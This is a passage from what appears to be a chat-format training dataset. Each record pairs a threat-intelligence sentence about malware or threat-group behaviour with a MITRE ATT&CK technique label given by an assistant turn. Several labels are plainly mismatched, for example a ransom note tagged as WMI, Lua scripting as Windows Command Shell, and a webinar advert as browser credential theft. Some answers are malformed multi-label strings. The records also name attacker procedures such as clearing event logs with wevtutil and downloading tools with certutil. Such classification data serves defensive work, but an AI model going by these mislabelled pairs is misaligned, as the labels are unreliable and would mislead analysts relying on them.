%APPDATA%\\Microsoft\\ or %ProgramData%\\Microsoft\\ directories) and executed" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While the logo and commands are identical to the original hacktool, the name was changed to OrangeTeghal. To evade security software while deploying this tool on compromised systems, the attackers use a technique revealed at Black Hat EU ‘17 in the presentation Lost in Transaction: Process Doppelgänging. Process Doppelgänging uses NTFS transactions to modify the executable of a seemingly benign process that is suspended right after creation" }, { "role": "assistant", "content": "T1055.013 - Process Doppelgänging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton removes logs from \"/var/logs\" and \"/Library/logs\"." }, { "role": "assistant", "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used Regsvr32 to bypass application whitelisting techniques." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML.." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command_Keylog_offline:  Load into memory a dll that contains the function “PluginMe”.  After researching and analyzing additional Gh0stRAT samples while trying to figure out what dll contains “PluginMe”, I found a DLL for keylogging (called Keylog.dll) in a Gh0stRAT 2.0 sample that exported “PluginMe”.  Using that and a cross-comparison of another Gh0stRAT sample that I’ve previously analyzed, I was able to determine that “PluginMe” is a offline keyboard manager" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth collects data in a plaintext file named r1.log before exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used malware to disable Windows Defender through modification of the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This section describes how we identified additional Stealth Falcon victims and bait content, and traced Stealth Falcon’s spyware to additional C2 servers" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can leverage its implementation of Mimikatz to obtain and use silver tickets." }, { "role": "assistant", "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These vulnerabilities include:CVE-2015-6585: Hangul Word Processor VulnerabilityCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x VulnerabilityCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 VulnerabilityCVE-2016-1019: Adobe Flash Player 21.0.0.197 VulnerabilityCVE-2016-4117: Adobe Flash Player 21.0.0.226 VulnerabilityDHS recommends that organizations upgrade these applications to the latest version and patch level" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, \".report\". After the elapsed time, XCSSET executes additional modules." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has an integrated scripting engine to download and execute Lua scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Maze encryption process has used batch scripts with various commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak encodes the message body of HTTP traffic with Base64." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can decode encrypted strings to enable execution of commands and payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel" }, { "role": "assistant", "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can execute arbitrary commands as root on a compromised system." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate." }, { "role": "assistant", "content": "T1606.002 - Forge Web Credentials: SAML token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can launch port scans." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "supports file encryption (AES with the key \"lolomycin2017\")." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee has the ability to base64 encode C2 server responses." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT18 obfuscates strings in the payload." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POORAIM can conduct file browsing." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32." }, { "role": "assistant", "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many of this APT’s components are signed with phony Intel and AMD digital certificates" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note that the username could be a small joke on the attackers’ part regarding the attribution to FIN7" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files." }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has targeted victims with spearphishing emails containing malicious Microsoft Word documents." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StreamEx has the ability to enumerate system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has used a variety of open-source remote access Trojans for its operations." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "discovers information about the infected machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After running within the %TEMP% path, Comnie will delete the original file" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use PowerSploit or other scripting frameworks to perform execution." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 can enumerate local and domain user account information." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail can identify and add files that possess specific file extensions to an array for archiving." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used \"whoami\" to identify the local user and their privileges." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can perform keylogging." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Interestingly, we’ve seen recent samples embedding decoy documents that are screenshots of botnet C&C panels or dumps of credit card numbers" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempted to use RDP to move laterally." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used the \"net share\" command as part of network reconnaissance." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has extensively used strategic web compromises to target victims." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rancor has downloaded additional malware, including by using certutil." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/  folder" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can use Tasklist to collect a list of running tasks." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has obfuscated the wallet address in the payload binary." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "variants can use ports 443, 8443, and 8080 for communications." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may collect information on the victim's anti-virus software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can make small changes to itself in order to change its checksum and hash value." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has cleared event logs, including by using the commands \"wevtutil cl System\" and \"wevtutil cl Security\"." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has added batch scripts to the startup folder." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: FIN7 phishing lure persistence mechanisms Examining Attacker Shortcut Files In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The RDAT sample with the novel EWS C2 channel also had HTTP and DNS tunneling as C2 channels as well, which are very similar to other RDAT samples we collected. The HTTP C2 channel uses HTTP POST requests to transmit data to the C2 server" }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam." }, { "role": "assistant", "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions', 'T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy uses Tor for command and control." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has commands to enumerate all storage devices and to find all files that start with a particular string." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a 